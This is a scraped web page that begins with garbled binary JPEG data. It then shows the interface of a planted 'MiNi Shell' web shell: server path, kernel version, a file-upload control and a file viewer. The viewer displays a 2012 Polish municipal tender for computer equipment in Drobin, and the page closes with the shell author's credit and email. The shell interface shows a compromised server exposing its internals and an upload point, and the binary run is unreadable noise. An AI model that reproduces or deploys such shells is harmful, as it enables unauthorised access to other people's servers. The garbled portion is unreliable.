JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120904/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120904/329098-N-2012.html

<p class="kh_header"><b>Drobin: Dostawa sprzętu komputerowego wraz z oprogramowaniem oraz jego instalacja pod wskazanymi adresami w Gminie Drobin</b><br>
<b>Numer ogłoszenia: 329098 - 2012; data zamieszczenia: 04.09.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta i Gminy Drobin , ul. Piłsudskiego 12, 09-210 Drobin, woj. mazowieckie, tel. 024 2601441 w. 107.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa sprzętu komputerowego wraz z oprogramowaniem oraz jego instalacja pod wskazanymi adresami w Gminie Drobin.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
1.	Dostawa 140 (typ 1) nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert zestawów komputerowych wraz z oprogramowaniem systemowym, biurowym 
i  antywirusowym, wykorzystywanych do nauki podstaw obsługi, korzystania z Internetu i popularnych aplikacji biurowych i komunikacyjnych.
2.	Dostawa 150 nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert identycznych drukarek komputerowych wraz z oprogramowaniem niezbędnych do obsługi drukarki za pomocą komputerów,
3.	Dostawa 47 (typ 2) nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert zestawów komputerowych wraz z oprogramowaniem systemowym, biurowym 
i  antywirusowym, wykorzystywanych do nauki podstaw obsługi, korzystania z Internetu i popularnych aplikacji biurowych i komunikacyjnych.
4.	Dostawa 3 (typ 3) nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert zestawów komputerowych wraz z oprogramowaniem systemowym, biurowym 
i  antywirusowym, wykorzystywanych do nauki podstaw obsługi, korzystania z Internetu i popularnych aplikacji biurowych i komunikacyjnych.
5.	Dostawa 10 nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert laptopów wraz z oprogramowaniem systemowym, biurowym i  antywirusowym, wykorzystywanych do nauki podstaw obsługi, korzystania z Internetu i popularnych aplikacji biurowych i komunikacyjnych,
6.	Dostawa 3 nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert kompletów składających się z projektora multimedialnego i ekranu do projektowa multimedialnego  wraz z oprogramowaniem niezbędnym do obsługi,
7.	Dostawa 6 nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert identycznych drukarek z funkcją kopiowania i skanowania wraz z oprogramowaniem niezbędnych do obsługi drukarki za pomocą komputerów
8.	Dostawa 3  (typ 4) nieużywanych, nieuszkodzonych, nieregenerowanych, nieobciążonych prawami osób lub podmiotów trzecich i wyprodukowanych nie wcześniej niż na 6 miesięcy przed terminem składania ofert komputerów przenośnych wraz z oprogramowaniem systemowym, biurowym 
i  antywirusowym, wykorzystywanych do nauki podstaw obsługi, korzystania z Internetu i popularnych aplikacji biurowych i komunikacyjnych,
9.	Dostawa 1 (większego) nieużywanego, nieuszkodzonego, nieregenerowanego, nieobciążonego prawami osób lub podmiotów trzecich i wyprodukowanego nie wcześniej niż na 6 miesięcy przed terminem składania ofert urządzenia wielofunkcyjnego wraz z oprogramowaniem niezbędnym do obsługi drukarki za pomocą komputerów,
10.	Dostawa 10 szt. sprzętu do e-podpisu dla osób niepełnosprawnych wraz z licencją na 6 lat 
11.	Instalacja dostarczonych zestawów komputerowych i drukarek oraz pozostałego sprzętu w lokalizacjach wskazanych przez Zamawiającego na terenie Gminy Drobin.
12.	Świadczenie serwisu gwarancyjnego przez okres 36 miesięcy od dnia odbioru i uruchomienia w miejscu instalacji sprzętu.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.21.40.00-2, 30.23.13.00-0, 30.21.30.00-5, 48.00.00.00-8, 30.21.31.00-6, 30.23.20.00-4, 30.23.10.00-7, 30.23.72.00-1, 30.23.21.30-4, 30.23.13.10-3, 30.23.21.00-5, 48.62.00.00-0, 48.76.10.00-0, 50.31.20.00-5, 72.61.10.00-6, 79.13.21.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1. Ustala się wadium w wysokości 20.000,00 zł (słownie: dwadzieścia tysięcy złotych).
9.2. Wykonawca wnosi wadium w jednej lub kilku następujących formach:
a) pieniężnej,
b) poręczenia bankowego lub poręczenia spółdzielczej kasy oszczędnościowo - kredytowej,
 z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c) gwarancji bankowej,
d) gwarancji ubezpieczeniowej,
e) poręczenia udzielanego przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości
(Dz. U. Nr 109, poz. 1158 z późniejszymi zmianami). 
9.3. Wadium wnoszone w pieniądzu należy zgodnie z art. 45 ust 7 ustawy Pzp wpłacić wyłącznie przelewem na rachunek Urzędu Miasta i Gminy Drobin nr: BS Mazowsze ODrobin 85 9042 1068 0420 0358 2000 0050  w takim terminie, aby najpóźniej przed upływem terminu składania ofert - określonym w pkt 11.1. SIWZ - środki finansowe z tytułu wadium znajdowały się na wskazanym wyżej rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego ww. rachunek.
9.4. Pozostałe, niepieniężne formy wadium wymienione w pkt 9.2. należy w formie oryginału załączyć do oferty. 
9.5. Gwarancja bankowa lub ubezpieczeniowa, stanowiąca formę wniesienia wadium, winna spełniać  co najmniej następujące wymogi (pod rygorem wykluczenia wykonawcy):
a) ustalać beneficjenta gwarancji, tj. Gminę Drobin 
b) określać kwotę gwarantowaną w zł. (ustaloną w SIWZ),
c) określać termin ważności (wynikający z SIWZ),
d) określać przedmiot gwarancji (wynikający z SIWZ),
e) być gwarancją nie odwoływalną, bezwarunkową, płatną na każde żądanie.

UWAGA
Z treści gwarancji bankowej lub ubezpieczeniowej powinno wynikać uprawnienie Zamawiającego do zatrzymania wadium, jeżeli wystąpią przesłanki opisane w art. 46  ust 4a i 5 ustawy, w szczególności uprawnienie Zamawiającego do zatrzymania wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złoży dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw chyba, że udowodni, że wynika to z przyczyn nie leżących po jego stronie.

9.6. Do wadium wniesionego w formie poręczenia wymagania opisane w pkt 9.4. i 9.5. stosuje się odpowiednio.
9.7. W przypadku nie wniesienia wadium na warunkach określonych w pkt 9.1. - 9.4. wykonawca zostanie wykluczony z dalszego postępowania, a złożona przez niego oferta zostanie odrzucona.
9.8. Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca jest zobowiązany wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, należycie wykonał należycie, co najmniej dwie dostawy sprzętu komputerowego wraz z oprogramowaniem oraz jego instalację, odpowiadające swoim zakresem przedmiotowi niniejszego zamówienia, o wartości brutto minimum 200.000,00 zł (słownie: dwieście tysięcy złotych) każda. Ocena na podstawie przedstawionych dokumentów metodą warunku granicznego spełnia / niespełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa wymagań w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykażę, że posiada opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na sumę ubezpieczeniową nie mniejszą niż: 700.000,00 zł (słownie: siedemset tysięcy złotych). Ocena na podstawie przedstawionych dokumentów metodą warunku granicznego spełnia / niespełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>W celu potwierdzenia, że oferowane dostawy lub usługi odpowiadają wymaganiom określonym przez Zamawiającego, Wykonawca winien przedłożyć:
1) Certyfikat ISO 9001:2000 lub równoważny dla producenta sprzętu (jednostka centralna, monitor).
2) Certyfikat ISO 14001 lub równoważny dla producenta sprzętu (jednostka centralna, monitor).
3) Certyfikat producenta preinstalowanego systemu operacyjnego, potwierdzający poprawną współpracę oferowanych modeli komputerów z preinstalowaną wersją systemu operacyjnego w wersji 64-bitowej - dopuszcza się wydruk ze strony internetowej w języku polskim. W przypadku komputerów produkowanych w oparciu o różne płyty główne w ramach jednego modelu komputera, wymagane jest przedłożenie dokumentu potwierdzającego, że aktywny status dla oferowanego modelu komputera został uzyskany na podstawie testów z zastosowaniem konkretnego i oferowanego w ramach niniejszego postępowania modelu płyty głównej.
4) Deklarację zgodności CE dla oferowanego sprzętu (jednostka centralna, monitor).
5) Komputer musi spełniać wymogi min. normy Energy Star lub równoważnej. Udokumentowanie wpisu dotyczącego oferowanego komputera w internetowym katalogu http://www.eu-energystar.org lub http://www.energystar.gov - dopuszcza się załączenie do oferty wydruku ze strony internetowej w języku polskim wskazujący na producenta, model i typ oferowanego komputera (jednostka centralna i monitor).
6) Certyfikat TCO 03 lub równoważny dla oferowanego monitora.
7) Specyfikację techniczną, w której Wykonawca zamieści wszystkie wymagane informacje i dane oraz odpowiedzi na wszystkie pytania wynikające z opracowanych przez Zamawiającego dokumentów stanowiących załącznik nr 1a.
8) Wydruk potwierdzający spełnienie wymaganej wydajności dla oferowanej konfiguracji sprzętu (zgodnie z załącznikiem 1 a do s.i.w.z.).
9) Certyfikat producenta oprogramowania na dostarczany sprzęt (jednostka centralna).
10) Pisemny wykaz linków do stron internetowych umożliwiający dostęp do najnowszych sterowników i uaktualnień na stronie producenta zestawu realizowany poprzez podanie na dedykowanej stronie internetowej producenta numeru seryjnego lub modelu komputera wraz z opisem uzyskania tych informacji i aktualizacji (jednostka centralna).
11) Pisemny wykaz zawierający adresy stron internetowych, z których Zamawiający uzyska komplet sterowników dla fabrycznie preinstalowanych wersji systemu operacyjnego.
12) Oświadczenia podmiotu realizującego serwis gwarancyjny lub producenta sprzętu o spełnieniu warunku opcji -zachowaj swój dysk- w przypadku awarii dysku twardego.
13) Dokument potwierdzający, że serwis urządzeń będzie realizowany zgodnie z wymaganiami normy ISO 9001 lub równoważną.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>19.3. Zamawiający zastrzega sobie prawo wprowadzenia zmian do zawartej umowy z wybranym Wykonawcą w niniejszym postępowaniu, w przypadku wystąpienia niżej podanych okoliczności:
19.3.1. przesunięcie terminów umownych, jeśli konieczność ta, nastąpiła na skutek okoliczności, których nie można było przewidzieć w chwili zawierania niniejszej umowy,
19.3.2. zmiany wynagrodzenia w przypadki zmiany ustawowej stawki podatkowej VAT.
19.4. Zmiany, o których mowa mogą nastąpić jedynie w uzasadnionych przypadkach, a w szczególności:
- w zakresie punktu 19.3.1. - w przypadku wystąpienia -siły wyższej-, tj. katastrofa naturalna, strajk, pożar, eksplozja, wojna atak terrorystyczny lub obiektywne okoliczności wpływających na brak możliwości wykonania zamówienia w określonym czasie (m.in. okres urlopowy, awaria sprzętu, sieci elektrycznej, telefonicznej itp.),
- w zakresie punktu 19.3.2. - w przypadku zmian powszechnie obowiązujących przepisów prawa w trakcie realizacji umowy, w szczególności dotyczących przepisów podatkowych, np. zmiany ustawowe.
19.5. Zamawiający w uzasadnionych przypadkach (np. choroby, nieplanowany urlop itp.) dopuszcza zmiany postanowień umowy dotyczące powierzenie wykonania przedmiotu zamówienia innym osobom niż wskazane w ofercie na osoby o porównywalnych kwalifikacjach i doświadczeniu zawodowym lub wyższym.
19.6. Wykonawca wnioskuje o zmianę umowy, przekłada Zamawiającemu pisemne uzasadnienie konieczności wprowadzenia zmian do umowy. O wystąpieniu okoliczności mogących wpłynąć na zmiany umowy Wykonawca winien jest poinformować Zamawiającego pisemnie.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.drobin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta i Gminy Drobin, ul. Piłsudskiego 12, 09-210 Drobin (pok. nr 7 i nr 9a).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2012 godzina 10:00, miejsce: Urząd Miasta i Gminy Drobin, ul. Piłsudskiego 12, 09-210 Drobin, sekretariat na pierwszym piętrze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt współfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka, Oś priorytetowa 8.- Społeczeństwo informacyjne - zwiększenie innowacyjności gospodarki, Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com